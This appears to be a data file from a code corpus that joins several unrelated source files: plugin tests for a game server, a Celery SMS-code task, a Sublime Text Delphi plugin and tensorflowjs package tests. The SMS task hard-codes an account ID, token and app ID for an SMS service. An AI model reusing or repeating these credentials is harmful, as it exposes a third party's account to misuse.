team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 799)}) when(self.db).get(any).thenReturn("11") spy2(minqlx.COMMANDS.handle_input) when2(minqlx.COMMANDS.handle_input, any, any, any).thenReturn(None) patch(minqlx.PlayerInfo, lambda *args: mock(spec=minqlx.PlayerInfo)) patch(minqlx.next_frame, lambda func: func) when(self.db).delete(any).thenReturn(None) self.plugin.callback_ratings([player1, player2], minqlx.CHAT_CHANNEL) verify(minqlx.COMMANDS).handle_input(any, any, any) verify(self.db).delete("minqlx:players:{}:minelo:abovegames".format(player2.steam_id)) verify(self.db).delete("minqlx:players:{}:minelo:freegames".format(player2.steam_id)) def test_handle_round_start_increases_application_games_for_untracked_player(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 799)}) when(self.db).get(any).thenReturn("3") when(self.db).delete(any).thenReturn(None) when(self.db).exists(any).thenReturn(False) when(self.db).incr(any).thenReturn(None) self.plugin.handle_round_start(1) verify(self.db).incr("minqlx:players:{}:minelo:freegames".format(player2.steam_id)) def test_handle_round_start_makes_exception_for_player_in_exception_list(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") player3 = fake_player(789, "Fake Player3", team="red") connected_players(player1, player2, player3) self.setup_balance_ratings({(player1, 900), (player2, 799), (player3, 600)}) self.setup_exception_list([player3]) when(self.db).get(any).thenReturn("3") when(self.db).delete(any).thenReturn(None) when(self.db).exists(any).thenReturn(False) when(self.db).incr(any).thenReturn(None) self.plugin.handle_round_start(1) verify(self.db).incr("minqlx:players:{}:minelo:freegames".format(player2.steam_id)) verify(self.db, times=0).incr("minqlx:players:{}:minelo:freegames".format(player3.steam_id)) def test_handle_round_start_starts_tracking_for_low_elo_player(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 799)}) when(self.db).get(any).thenReturn("3") when(self.db).delete(any).thenReturn(None) when(self.db).exists(any).thenReturn(False) when(self.db).incr(any).thenReturn(None) self.plugin.handle_round_start(1) assert_that(self.plugin.tracked_player_sids, has_item(player2.steam_id)) def test_handle_round_start_resets_above_games_for_low_elo_player(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 799)}) when(self.db).get(any).thenReturn("3") when(self.db).delete(any).thenReturn(None) when(self.db).exists(any).thenReturn(True) when(self.db).incr(any).thenReturn(None) self.plugin.handle_round_start(1) verify(self.db).delete("minqlx:players:{}:minelo:abovegames".format(player2.steam_id)) def test_handle_round_start_increases_above_games_for_application_games_player(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 801)}) when(self.db).get(any).thenReturn("3") when(self.db).delete(any).thenReturn(None) when(self.db).exists(any).thenReturn(True) when(self.db).incr(any).thenReturn(None) self.plugin.handle_round_start(1) verify(self.db).incr("minqlx:players:{}:minelo:abovegames".format(player2.steam_id)) def test_handle_round_start_increases_above_games_for_application_games_player_with_no_aobve_games_set(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 801)}) when(self.db).get(any).thenReturn("1") when(self.db).delete(any).thenReturn(None) when(self.db).exists(any).thenReturn(True) when(self.db).incr(any).thenReturn(None) self.plugin.handle_round_start(1) verify(self.db).incr("minqlx:players:{}:minelo:abovegames".format(player2.steam_id)) def test_handle_round_start_starts_tracking_of_above_elo_players_for_application_games_player(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 801)}) when(self.db).get(any).thenReturn("3") when(self.db).delete(any).thenReturn(None) when(self.db).exists(any).thenReturn(True) when(self.db).incr(any).thenReturn(None) self.plugin.handle_round_start(1) assert_that(self.plugin.tracked_player_sids, has_item(player2.steam_id)) def test_handle_round_start_removes_minelo_db_entries_for_above_elo_player(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 801)}) when(self.db).get(any).thenReturn("11") when(self.db).delete(any).thenReturn(None) when(self.db).exists(any).thenReturn(True) when(self.db).incr(any).thenReturn(None) self.plugin.handle_round_start(1) verify(self.db).delete("minqlx:players:{}:minelo:freegames".format(player2.steam_id)) verify(self.db).delete("minqlx:players:{}:minelo:abovegames".format(player2.steam_id)) def test_handle_round_start_skips_already_tracked_player(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.plugin.tracked_player_sids.append(player2.steam_id) self.setup_balance_ratings({(player1, 900), (player2, 799)}) when(self.db).get(any).thenReturn(3) when(self.db).delete(any).thenReturn(None) when(self.db).exists(any).thenReturn(False) when(self.db).incr(any).thenReturn(None) self.plugin.handle_round_start(1) verify(self.db, times=0).delete(any) verify(self.db, times=0).delete(any) def test_handle_round_start_with_unsupported_gametype(self): setup_game_in_progress("unsupported") player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({}) self.plugin.handle_round_start(2) verify(self.plugin._loaded_plugins["balance"], times=0).add_request(any, any, any) def test_handle_round_start_with_no_balance_plugin(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) mocked_logger = mock(spec=logging.Logger) spy2(minqlx.get_logger) when(minqlx).get_logger(self.plugin).thenReturn(mocked_logger) self.setup_no_balance_plugin() self.plugin.handle_round_start(5) verify(mocked_logger, atleast=1).warning(matches("Balance plugin not found.*")) def test_cmd_mercis_shows_currently_connected_merciful_players(self): player = fake_player(666, "Cmd using Player") player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") player3 = fake_player(789, "Fake Player3", team="blue") connected_players(player, player1, player2, player3) self.setup_balance_ratings({(player, 1400), (player1, 801), (player2, 799), (player3, 900)}) when(self.db).get("minqlx:players:{}:minelo:freegames".format(player1.steam_id)).thenReturn("2") when(self.db).get("minqlx:players:{}:minelo:freegames".format(player2.steam_id)).thenReturn("3") when(self.db).get("minqlx:players:{}:minelo:abovegames".format(player1.steam_id)).thenReturn("6") when(self.db).get("minqlx:players:{}:minelo:freegames".format(player.steam_id)).thenReturn(None) when(self.db).get("minqlx:players:{}:minelo:freegames".format(player3.steam_id)).thenReturn(None) self.plugin.cmd_mercis(player, ["!mercis"], self.reply_channel) assert_channel_was_replied(self.reply_channel, matches("Fake Player1 \(elo: 801\):.*8.*application matches " "left,.*6.*matches above.*")) assert_channel_was_replied(self.reply_channel, matches("Fake Player2 \(elo: 799\):.*7.*application matches " "left")) def test_cmd_mercis_replies_to_main_cbannel_instead_of_team_chat(self): self.addCleanup(self.reset_chat_channel, minqlx.CHAT_CHANNEL) minqlx.CHAT_CHANNEL = mocked_channel() player = fake_player(666, "Cmd using Player") player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") player3 = fake_player(789, "Fake Player3", team="blue") connected_players(player, player1, player2, player3) self.setup_balance_ratings({(player, 1400), (player1, 801), (player2, 799), (player3, 900)}) when(self.db).get("minqlx:players:{}:minelo:freegames".format(player1.steam_id)).thenReturn("2") when(self.db).get("minqlx:players:{}:minelo:freegames".format(player2.steam_id)).thenReturn("3") when(self.db).get("minqlx:players:{}:minelo:abovegames".format(player1.steam_id)).thenReturn("6") when(self.db).get("minqlx:players:{}:minelo:freegames".format(player.steam_id)).thenReturn(None) when(self.db).get("minqlx:players:{}:minelo:freegames".format(player3.steam_id)).thenReturn(None) self.plugin.cmd_mercis(player, ["!mercis"], minqlx.BLUE_TEAM_CHAT_CHANNEL) assert_channel_was_replied(minqlx.CHAT_CHANNEL, matches("Fake Player1 \(elo: 801\):.*8.*application matches " "left,.*6.*matches above.*")) assert_channel_was_replied(minqlx.CHAT_CHANNEL, matches("Fake Player2 \(elo: 799\):.*7.*application matches " "left")) def reset_chat_channel(self, original_chat_channel): minqlx.CHAT_CHANNEL = original_chat_channel def test_cmd_mercis_shows_no_mercis_if_no_player_using_their_application_matches(self): player = fake_player(666, "Cmd using Player") connected_players(player) self.setup_balance_ratings({(player, 1400)}) when(self.db).get(any).thenReturn(None) self.plugin.cmd_mercis(player, ["!mercis"], minqlx.CHAT_CHANNEL) assert_plugin_sent_to_console(any, times=0)
[]
Vent-Any/meiduo_mall_cangku
meiduo_mall/celery_tasks/sms/tasks.py
5b3b7f029be267cb5d2d3666f99be166d27213f1
from ronglian_sms_sdk import SmsSDK from celery_tasks.main import app # 写我们的任务(函数) # 任务必须要celery的实例对象装饰器task装饰 # 任务包的任务需要celery调用自检检查函数。(在main里面写。) @app.task def celery_send_sms_code(mobile, sms_code): accId = '8a216da8762cb4570176c60593ba35ec' accToken = '514a8783b8c2481ebbeb6a814434796f' appId = '8a216da8762cb4570176c605948c35f2' # 9.1. 创建荣联云 实例对象 sdk = SmsSDK(accId, accToken, appId) tid = '1' # 我们发送短信的模板,值 只能是 1 因为我们是测试用户 mobile = '%s' % mobile # '手机号1,手机号2' 给哪些手机号发送验证码,只能是测试手机号 datas = (sms_code, 10) # ('变量1', '变量2') 涉及到模板的变量 # 您的验证码为{1},请于{2} 分钟内输入 # 您的验证码为666999,请于5 分钟内输入 # 9.2. 发送短信 sdk.sendMessage(tid, mobile, datas)
[((14, 10, 14, 40), 'ronglian_sms_sdk.SmsSDK', 'SmsSDK', ({(14, 17, 14, 22): 'accId', (14, 24, 14, 32): 'accToken', (14, 34, 14, 39): 'appId'}, {}), '(accId, accToken, appId)', False, 'from ronglian_sms_sdk import SmsSDK\n')]
JeisonJHA/Plugins-Development
delphiIDE.py
cccb58908eed6114c569e53d5710e70b8d53f5c5
import sublime_plugin class MethodDeclaration(object): """docstring for MethodDeclaration""" def __init__(self): self._methodclass = None self.has_implementation = False self.has_interface = False @property def has_implementation(self): return self._has_implementation @has_implementation.setter def has_implementation(self, value): self._has_implementation = value @property def has_interface(self): return self._has_interface @has_interface.setter def has_interface(self, value): self._has_interface = value @property def methodname(self): return self._methodname @methodname.setter def methodname(self, value): self._methodname = value @property def methodregion(self): return self._methodregion @methodregion.setter def methodregion(self, value): self._methodregion = value @property def visibility(self): return self._visibility @visibility.setter def visibility(self, value): self._visibility = value @property def params(self): return self._params @params.setter def params(self, value): self._params = value @property def methodclass(self): return self._methodclass @methodclass.setter def methodclass(self, value): self._methodclass = value class ClassDeclaration(object): """docstring for ClassDeclaration""" @property def classname(self): return self._classname @classname.setter def classname(self, value): self._classname = value @property def classregion(self): return self._classregion @classregion.setter def classregion(self, value): self._classregion = value @property def privateregion(self): return self._privateregion @privateregion.setter def privateregion(self, value): self._privateregion = value @property def protectedregion(self): return self._protectedregion @protectedregion.setter def protectedregion(self, value): self._protectedregion = value @property def publicregion(self): return self._publicregion @publicregion.setter def publicregion(self, value): self._publicregion = value @property def publishedregion(self): return self._publishedregion @publishedregion.setter def publishedregion(self, value): self._publishedregion = value class DelphiIdeCommand(sublime_plugin.TextCommand): # // { "keys": ["ctrl+shift+x"], "command": "delphi_ide", "args": {"teste": "delphimethodnav"}} # view.window().run_command('show_panel', # args={"panel": 'output.find_results', "toggle": True}) def run(self, edit, teste): print('teste[0]:%s' % teste) method = None try: method = getattr(self, teste) except AttributeError: raise NotImplementedError("Class `{}` does not implement `{}`". format(self.__class__.__name__, teste)) method() def delphimethodnav(self): print('vai doido') def getMethodInformation(self): view = self.view cursor_region = view.sel()[0] cursor_pt = view.sel()[0].begin() if not view.match_selector(cursor_pt, 'function.implementation.delphi'): # exit because it is not in a method return None def params(region): params_region = view.find_by_selector( 'meta.function.parameters.delphi') param_name_region = view.find_by_selector( 'variable.parameter.function.delphi') params_region_filt = [ s for s in params_region if region.contains(s)] params_region_filt = [ s for s in param_name_region if params_region_filt[0].contains(s)] return params_region_filt def paramsFromRegion(region): try: params_region_filt = params(region) x = [view.substr(x) for x in params_region_filt] return x except: return [] def getFunctionName(): functionname = view.find_by_selector('entity.name.function') functionnamefiltered = [ n for n in functionname if method.methodregion[0].contains(n)] return view.substr(functionnamefiltered[0]) # has_implementation # has_interface # methodname # methodregion # visibility # params # methodclass method = MethodDeclaration() selector = view.find_by_selector method.methodregion = [r for r in selector('meta.function.delphi') if cursor_region.intersects(r)] method.methodname = getFunctionName() method.params = self.paramsFromRegion(method.methodregion[0]) return method def getClassInformation(self): pass
[]
syt123450/tfjs-converter
python/test_pip_package.py
a90fa59a44d9425beb7b1584fe753c62d62bbc4d
# Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Test the Python API and shell binary of the tensorflowjs pip package.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import glob import json import os import shutil import subprocess import sys import tempfile import unittest import numpy as np import tensorflow as tf from tensorflow import keras from tensorflow.python.eager import def_function from tensorflow.python.framework import constant_op from tensorflow.python.framework import dtypes from tensorflow.python.framework import tensor_spec from tensorflow.python.ops import variables from tensorflow.python.training.tracking import tracking from tensorflow.python.saved_model.save import save import tensorflow_hub as hub import tensorflowjs as tfjs def _createKerasModel(layer_name_prefix, h5_path=None): """Create a Keras model for testing. Args: layer_name_prefix: A prefix string for layer names. This helps avoid clashes in layer names between different test methods. h5_path: Optional string path for a HDF5 (.h5) file to save the model in. Returns: An instance of keras.Model. """ input_tensor = keras.layers.Input((3, )) dense1 = keras.layers.Dense( 4, use_bias=True, kernel_initializer='ones', bias_initializer='zeros', name=layer_name_prefix + '1')(input_tensor) output = keras.layers.Dense( 2, use_bias=False, kernel_initializer='ones', name=layer_name_prefix + '2')(dense1) model = keras.models.Model(inputs=[input_tensor], outputs=[output]) if h5_path: model.save(h5_path) return model def _createTensorFlowSavedModelV1(name_scope, save_path): """Create a TensorFlow SavedModel for testing. Args: name_scope: Name scope to create the model under. This helps avoid op and variable name clashes between different test methods. save_path: The directory path in which to save the model. """ graph = tf.Graph() with graph.as_default(): with tf.compat.v1.name_scope(name_scope): x = tf.compat.v1.constant([[37.0, -23.0], [1.0, 4.0]]) w = tf.compat.v1.get_variable('w', shape=[2, 2]) y = tf.compat.v1.matmul(x, w) output = tf.compat.v1.nn.softmax(y) init_op = w.initializer # Create a builder. builder = tf.compat.v1.saved_model.builder.SavedModelBuilder(save_path) with tf.compat.v1.Session() as sess: # Run the initializer on `w`. sess.run(init_op) builder.add_meta_graph_and_variables( sess, [tf.compat.v1.saved_model.tag_constants.SERVING], signature_def_map={ "serving_default": tf.compat.v1.saved_model.signature_def_utils.predict_signature_def( inputs={"x": x}, outputs={"output": output}) }, assets_collection=None) builder.save() def _createTensorFlowSavedModel(name_scope, save_path): """Create a TensorFlow SavedModel for testing. Args: name_scope: Name scope to create the model under. This helps avoid op and variable name clashes between different test methods. save_path: The directory path in which to save the model. """ input_data = constant_op.constant(1., shape=[1]) root = tracking.AutoTrackable() root.v1 = variables.Variable(3.) root.v2 = variables.Variable(2.) root.f = def_function.function(lambda x: root.v1 * root.v2 * x) to_save = root.f.get_concrete_function(input_data) save(root, save_path, to_save) def _create_hub_module(save_path): """Create a TensorFlow Hub module for testing. Args: save_path: The directory path in which to save the model. """ # Module function that doubles its input. def double_module_fn(): w = tf.Variable([2.0, 4.0]) x = tf.compat.v1.placeholder(dtype=tf.float32) hub.add_signature(inputs=x, outputs=x*w) graph = tf.Graph() with graph.as_default(): spec = hub.create_module_spec(double_module_fn) m = hub.Module(spec) # Export the module. with tf.compat.v1.Session(graph=graph) as sess: sess.run(tf.compat.v1.global_variables_initializer()) m.export(save_path, sess) class APIAndShellTest(tf.test.TestCase): """Tests for the Python API of the pip package.""" @classmethod def setUpClass(cls): cls.class_tmp_dir = tempfile.mkdtemp() cls.tf_saved_model_dir = os.path.join(cls.class_tmp_dir, 'tf_saved_model') cls.tf_saved_model_v1_dir = os.path.join( cls.class_tmp_dir, 'tf_saved_model_v1') _createTensorFlowSavedModel('a', cls.tf_saved_model_dir) _createTensorFlowSavedModelV1('b', cls.tf_saved_model_v1_dir) cls.tf_hub_module_dir = os.path.join(cls.class_tmp_dir, 'tf_hub_module') _create_hub_module(cls.tf_hub_module_dir) @classmethod def tearDownClass(cls): shutil.rmtree(cls.class_tmp_dir) def setUp(self): # Make sure this file is not being run from the source directory, to # avoid picking up source files. if os.path.isdir( os.path.join(os.path.dirname(__file__), 'tensorflowjs')): self.fail('Do not run this test from the Python source directory. ' 'This file is intended to be run on pip install.') self._tmp_dir = tempfile.mkdtemp() super(APIAndShellTest, self).setUp() def tearDown(self): if os.path.isdir(self._tmp_dir): shutil.rmtree(self._tmp_dir) super(APIAndShellTest, self).tearDown() def testVersionString(self): self.assertEqual(2, tfjs.__version__.count('.')) def testSaveKerasModel(self): with self.test_session(): # First create a toy keras model. model = _createKerasModel('MergedDense') tfjs.converters.save_keras_model(model, self._tmp_dir) # Briefly check the model topology. with open(os.path.join(self._tmp_dir, 'model.json')) as f: json_content = json.load(f) model_json = json_content['modelTopology'] self.assertIsInstance(model_json['model_config'], dict) self.assertIsInstance(model_json['model_config']['config'], dict) self.assertIn('layers', model_json['model_config']['config']) weights_manifest = json_content['weightsManifest'] self.assertIsInstance(weights_manifest, list) # Briefly check the weights manifest. weight_shapes = dict() weight_dtypes = dict() for manifest_item in weights_manifest: for weight in manifest_item['weights']: weight_name = weight['name'] weight_shapes[weight_name] = weight['shape'] weight_dtypes[weight_name] = weight['dtype'] self.assertEqual( sorted(list(weight_shapes.keys())), sorted([ 'MergedDense1/kernel', 'MergedDense1/bias', 'MergedDense2/kernel' ])) self.assertEqual(weight_shapes['MergedDense1/kernel'], [3, 4]) self.assertEqual(weight_shapes['MergedDense1/bias'], [4]) self.assertEqual(weight_shapes['MergedDense2/kernel'], [4, 2]) self.assertEqual(weight_dtypes['MergedDense1/kernel'], 'float32') self.assertEqual(weight_dtypes['MergedDense1/bias'], 'float32') self.assertEqual(weight_dtypes['MergedDense2/kernel'], 'float32') def testLoadKerasModel(self): # Use separate tf.Graph and tf.compat.v1.Session contexts to prevent name collision. with tf.Graph().as_default(), tf.compat.v1.Session(): # First create a toy keras model. model1 = _createKerasModel('MergedDense') tfjs.converters.save_keras_model(model1, self._tmp_dir) model1_weight_values = model1.get_weights() with tf.Graph().as_default(), tf.compat.v1.Session(): # Load the model from saved artifacts. model2 = tfjs.converters.load_keras_model( os.path.join(self._tmp_dir, 'model.json')) # Compare the loaded model with the original one. model2_weight_values = model2.get_weights() self.assertEqual(len(model1_weight_values), len(model2_weight_values)) for model1_weight_value, model2_weight_value in zip( model1_weight_values, model2_weight_values): self.assertAllClose(model1_weight_value, model2_weight_value) # Check the content of the output directory. self.assertTrue(glob.glob(os.path.join(self._tmp_dir, 'group*-*'))) def testInvalidInputFormatRaisesError(self): process = subprocess.Popen( [ 'tensorflowjs_converter', '--input_format', 'nonsensical_format', self._tmp_dir, self._tmp_dir ], stdout=subprocess.PIPE, stderr=subprocess.PIPE) _, stderr = process.communicate() self.assertGreater(process.returncode, 0) self.assertIn(b'--input_format', tf.compat.as_bytes(stderr)) def testMissingInputPathRaisesError(self): process = subprocess.Popen( [ 'tensorflowjs_converter' ], stdout=subprocess.PIPE, stderr=subprocess.PIPE) _, stderr = process.communicate() self.assertGreater(process.returncode, 0) self.assertIn(b'input_path', tf.compat.as_bytes(stderr)) def testKerasH5ConversionWorksFromCLI(self): with tf.Graph().as_default(), tf.compat.v1.Session(): # First create a toy keras model. os.makedirs(os.path.join(self._tmp_dir, 'keras_h5')) h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5') _createKerasModel('MergedDenseForCLI', h5_path) process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir ]) process.communicate() self.assertEqual(0, process.returncode) # Briefly check the model topology. with open(os.path.join(self._tmp_dir, 'model.json'), 'rt') as f: json_content = json.load(f) model_json = json_content['modelTopology'] self.assertIsInstance(model_json['model_config'], dict) self.assertIsInstance(model_json['model_config']['config'], dict) self.assertIn('layers', model_json['model_config']['config']) weights_manifest = json_content['weightsManifest'] self.assertIsInstance(weights_manifest, list) # Briefly check the weights manifest. weight_shapes = dict() weight_dtypes = dict() for manifest_item in weights_manifest: for weight in manifest_item['weights']: weight_name = weight['name'] weight_shapes[weight_name] = weight['shape'] weight_dtypes[weight_name] = weight['dtype'] self.assertEqual( sorted(list(weight_shapes.keys())), sorted([ 'MergedDenseForCLI1/kernel', 'MergedDenseForCLI1/bias', 'MergedDenseForCLI2/kernel' ])) self.assertEqual(weight_shapes['MergedDenseForCLI1/kernel'], [3, 4]) self.assertEqual(weight_shapes['MergedDenseForCLI1/bias'], [4]) self.assertEqual(weight_shapes['MergedDenseForCLI2/kernel'], [4, 2]) self.assertEqual(weight_dtypes['MergedDenseForCLI1/kernel'], 'float32') self.assertEqual(weight_dtypes['MergedDenseForCLI1/bias'], 'float32') self.assertEqual(weight_dtypes['MergedDenseForCLI2/kernel'], 'float32') # Verify that there is only one weight group due to the default # non-split_weights_by_layer behavior. The model is a small one, which # does not exceed the 4-MB shard size limit. Therefore, there should # be only one weight file. self.assertEqual( 1, len(glob.glob(os.path.join(self._tmp_dir, 'group*')))) def testKerasH5ConversionSplitWeightsByLayerWorksFromCLI(self): with tf.Graph().as_default(), tf.compat.v1.Session(): # First create a toy keras model. os.makedirs(os.path.join(self._tmp_dir, 'keras_h5')) h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5') _createKerasModel('MergedDenseForCLI', h5_path) process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'keras', '--split_weights_by_layer', h5_path, self._tmp_dir ]) process.communicate() self.assertEqual(0, process.returncode) # Briefly check the model topology. with open(os.path.join(self._tmp_dir, 'model.json'), 'rt') as f: json_content = json.load(f) model_json = json_content['modelTopology'] self.assertIsInstance(model_json['model_config'], dict) self.assertIsInstance(model_json['model_config']['config'], dict) self.assertIn('layers', model_json['model_config']['config']) weights_manifest = json_content['weightsManifest'] self.assertIsInstance(weights_manifest, list) # Briefly check the weights manifest. weight_shapes = dict() weight_dtypes = dict() for manifest_item in weights_manifest: for weight in manifest_item['weights']: weight_name = weight['name'] weight_shapes[weight_name] = weight['shape'] weight_dtypes[weight_name] = weight['dtype'] self.assertEqual( sorted(list(weight_shapes.keys())), sorted([ 'MergedDenseForCLI1/kernel', 'MergedDenseForCLI1/bias', 'MergedDenseForCLI2/kernel' ])) self.assertEqual(weight_shapes['MergedDenseForCLI1/kernel'], [3, 4]) self.assertEqual(weight_shapes['MergedDenseForCLI1/bias'], [4]) self.assertEqual(weight_shapes['MergedDenseForCLI2/kernel'], [4, 2]) self.assertEqual(weight_dtypes['MergedDenseForCLI1/kernel'], 'float32') self.assertEqual(weight_dtypes['MergedDenseForCLI1/bias'], 'float32') self.assertEqual(weight_dtypes['MergedDenseForCLI2/kernel'], 'float32') # Verify that there are two weight groups due to the optional flag # --split_weights_by_layer behavior. The model is a small one. None of # the layers should have weight sizes exceeding the 4-MB shard size # limit. self.assertEqual( 2, len(glob.glob(os.path.join(self._tmp_dir, 'group*')))) def testKerasH5ConversionWithSignatureNameErrors(self): process = subprocess.Popen( [ 'tensorflowjs_converter', '--input_format', 'keras', '--signature_name', 'bar', os.path.join(self._tmp_dir, 'foo.h5'), os.path.join(self._tmp_dir, 'output') ], stdout=subprocess.PIPE, stderr=subprocess.PIPE) _, stderr = process.communicate() self.assertGreater(process.returncode, 0) self.assertIn( b'The --signature_name flag is applicable only to', tf.compat.as_bytes(stderr)) def testConvertTFSavedModelV1WithCommandLineWorks(self): output_dir = os.path.join(self._tmp_dir) process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tf_saved_model', '--output_format', 'tfjs_graph_model', self.tf_saved_model_v1_dir, output_dir ]) process.communicate() self.assertEqual(0, process.returncode) weights = [{ 'paths': ['group1-shard1of1.bin'], 'weights': [{'dtype': 'float32', 'name': 'w', 'shape': [2, 2]}]}] # Load the saved weights as a JSON string. output_json = json.load( open(os.path.join(output_dir, 'model.json'), 'rt')) self.assertEqual(output_json['weightsManifest'], weights) # Check the content of the output directory. self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*'))) def testConvertTFHubModuleWithCommandLineWorks(self): output_dir = os.path.join(self._tmp_dir) process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tf_hub', self.tf_hub_module_dir, output_dir ]) process.communicate() self.assertEqual(0, process.returncode) weights = [{ 'paths': ['group1-shard1of1.bin'], 'weights': [{ 'shape': [2], 'name': 'module/Variable', 'dtype': 'float32' }] }] # Load the saved weights as a JSON string. output_json = json.load( open(os.path.join(output_dir, 'model.json'), 'rt')) self.assertEqual(output_json['weightsManifest'], weights) # Check the content of the output directory. self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*'))) def testConvertTFSavedModelWithCommandLineWorks(self): output_dir = os.path.join(self._tmp_dir) process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tf_saved_model', '--output_format', 'tfjs_graph_model', self.tf_saved_model_dir, output_dir ]) process.communicate() self.assertEqual(0, process.returncode) weights = [{ 'paths': ['group1-shard1of1.bin'], 'weights': [{ 'dtype': 'float32', 'shape': [], 'name': 'StatefulPartitionedCall/mul' }] }] # Load the saved weights as a JSON string. output_json = json.load( open(os.path.join(output_dir, 'model.json'), 'rt')) weights_manifest = output_json['weightsManifest'] self.assertEqual(len(weights_manifest), len(weights)) if sys.version_info[0] < 3: self.assertItemsEqual(weights_manifest[0]['paths'], weights[0]['paths']) self.assertItemsEqual(weights_manifest[0]['weights'], weights[0]['weights']) else: self.assertCountEqual(weights_manifest[0]['paths'], weights[0]['paths']) self.assertCountEqual(weights_manifest[0]['weights'], weights[0]['weights']) # Check the content of the output directory. self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*'))) def testConvertTFHubModuleWithCommandLineWorks(self): output_dir = os.path.join(self._tmp_dir) process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tf_hub', self.tf_hub_module_dir, output_dir ]) process.communicate() self.assertEqual(0, process.returncode) weights = [{ 'paths': ['group1-shard1of1.bin'], 'weights': [{ 'shape': [2], 'name': 'module/Variable', 'dtype': 'float32' }] }] # Load the saved weights as a JSON string. output_json = json.load( open(os.path.join(output_dir, 'model.json'), 'rt')) self.assertEqual(output_json['weightsManifest'], weights) # Check the content of the output directory. self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*'))) def testConvertTensorflowjsArtifactsToKerasH5(self): # 1. Create a toy keras model and save it as an HDF5 file. os.makedirs(os.path.join(self._tmp_dir, 'keras_h5')) h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5') with tf.Graph().as_default(), tf.compat.v1.Session(): model = _createKerasModel('MergedDenseForCLI', h5_path) model_json = model.to_json() # 2. Convert the HDF5 file to tensorflowjs format. process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir ]) process.communicate() self.assertEqual(0, process.returncode) # 3. Convert the tensorflowjs artifacts back to HDF5. new_h5_path = os.path.join(self._tmp_dir, 'model_2.h5') process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model', '--output_format', 'keras', os.path.join(self._tmp_dir, 'model.json'), new_h5_path]) process.communicate() self.assertEqual(0, process.returncode) # 4. Load the model back from the new HDF5 file and compare with the # original model. with tf.Graph().as_default(), tf.compat.v1.Session(): model_2 = keras.models.load_model(new_h5_path) model_2_json = model_2.to_json() self.assertEqual(model_json, model_2_json) def testLoadTensorflowjsArtifactsAsKerasModel(self): # 1. Create a toy keras model and save it as an HDF5 file. os.makedirs(os.path.join(self._tmp_dir, 'keras_h5')) h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5') with tf.Graph().as_default(), tf.compat.v1.Session(): model = _createKerasModel('MergedDenseForCLI', h5_path) model_json = model.to_json() # 2. Convert the HDF5 file to tensorflowjs format. process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir ]) process.communicate() self.assertEqual(0, process.returncode) # 3. Load the tensorflowjs artifacts as a keras.Model instance. with tf.Graph().as_default(), tf.compat.v1.Session(): model_2 = tfjs.converters.load_keras_model( os.path.join(self._tmp_dir, 'model.json')) model_2_json = model_2.to_json() self.assertEqual(model_json, model_2_json) def testVersion(self): process = subprocess.Popen( ['tensorflowjs_converter', '--version'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, _ = process.communicate() self.assertEqual(0, process.returncode) self.assertIn( tf.compat.as_bytes('tensorflowjs %s' % tfjs.__version__), tf.compat.as_bytes(stdout)) process = subprocess.Popen( ['tensorflowjs_converter', '-v'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, _ = process.communicate() self.assertEqual(0, process.returncode) self.assertIn( tf.compat.as_bytes('tensorflowjs %s' % tfjs.__version__), tf.compat.as_bytes(stdout)) class 